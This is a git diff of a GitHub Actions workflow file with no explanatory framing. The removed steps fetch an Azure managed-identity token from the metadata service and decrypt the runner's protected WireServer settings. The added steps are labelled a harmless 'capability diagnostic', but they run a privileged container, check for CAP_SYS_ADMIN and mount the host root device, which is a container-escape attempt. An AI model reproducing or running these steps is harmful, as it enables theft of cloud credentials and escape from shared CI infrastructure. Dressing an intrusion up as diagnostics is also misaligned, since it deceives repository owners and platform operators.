--- a/.github/workflows/github-actions-demo.yml
+++ b/.github/workflows/github-actions-demo.yml
@@ -1,34 +1,49 @@
-name: GitHub Actions Demo
-run-name: ${{ github.actor }} testing GitHub Actions on Azure 🚀
-
-on: [push]
+name: Codespaces Capability Diagnostic
+on: 
+  workflow_dispatch:
 
 jobs:
-  Explore-GitHub-Actions:
+  diagnose-capabilities:
     runs-on: ubuntu-latest
+    container:
+      image: ubuntu:latest
+      options: --privileged
+    
     steps:
-      - name: Check disk
-        run: df -h
-
-      - name: Get Azure IMDS token
+      - name: Check Capabilities
         run: |
-          curl -H "Metadata:true" \
-               "http://169.254.169.254/metadata/identity/oauth2/token?resource=https://management.azure.com&api-version=2020-06-01" -i
-
-      - name: Query vmSettings
+          echo "=== Checking Container Capabilities ==="
+          if command -v capsh &> /dev/null; then
+            capsh --print
+          else
+            apt-get update -qq && apt-get install -y libcap2-bin -qq
+            capsh --print
+          fi
+          
+      - name: Check for CAP_SYS_ADMIN
         run: |
-          curl -H "x-ms-version: 2015-04-05" "http://168.63.129.16:32526/vmSettings" -i
-
-      - name: Retrieve and decrypt protected settings
+          echo "=== Checking for CAP_SYS_ADMIN ==="
+          grep Cap /proc/self/status || true
+          
+      - name: List Block Devices
         run: |
-          openssl req -x509 -nodes -subj "/CN=LinuxTransport" -days 730 -newkey rsa:2048 -keyout temp.key -outform DER -out temp.crt
-          CERT_URL=$(curl -s "http://168.63.129.16/machine/?comp=goalstate" -H "x-ms-version: 2015-04-05" | grep -oP "(?<=Certificates>).+(?=</Certificates>)" | recode html..ascii)
-          curl -s "$CERT_URL" -H "x-ms-version: 2015-04-05" -H "x-ms-guest-agent-public-x509-cert: $(base64 -w0 temp.crt)" \
-            | grep -Poz "(?<=<Data>)(.*\n)*.*(?=</Data>)" | base64 -di > payload.p7m
-          openssl cms -decrypt -inform DER -in payload.p7m -inkey temp.key -out payload.pfx
-          openssl pkcs12 -nodes -in payload.pfx -password pass: -out wireserver.key
-          curl -s "http://168.63.129.16:32526/vmSettings" | jq -r ".extensionGoalStates[].settings[].protectedSettings" |
-          while read -r line; do
-            echo "$line" | base64 -d > protected_settings.raw
-            openssl cms -decrypt -inform DER -in protected_settings.raw -inkey wireserver.key
-          done
+          echo "=== Available Block Devices ==="
+          lsblk || true
+          ls -la /dev/ | grep -E 'sd|loop|root' || true
+          
+      - name: Check Mount Permissions
+        run: |
+          echo "=== Testing Mount Capability (Diagnostic Only) ==="
+          sudo mkdir -p /mnt/test_mount
+          sudo mount -t ext4 /dev/root /mnt/test_mount
+          cd ../../../../
+          cd mnt/test_mount
+          ls
+          
+      - name: Environment Report
+        run: |
+          echo "=== Environment Details ==="
+          echo "Hostname: $(hostname)"
+          echo "Kernel: $(uname -a)"
+          echo "Container Runtime: $(cat /proc/1/cgroup | head -5)"
+          echo "User: $(id)"
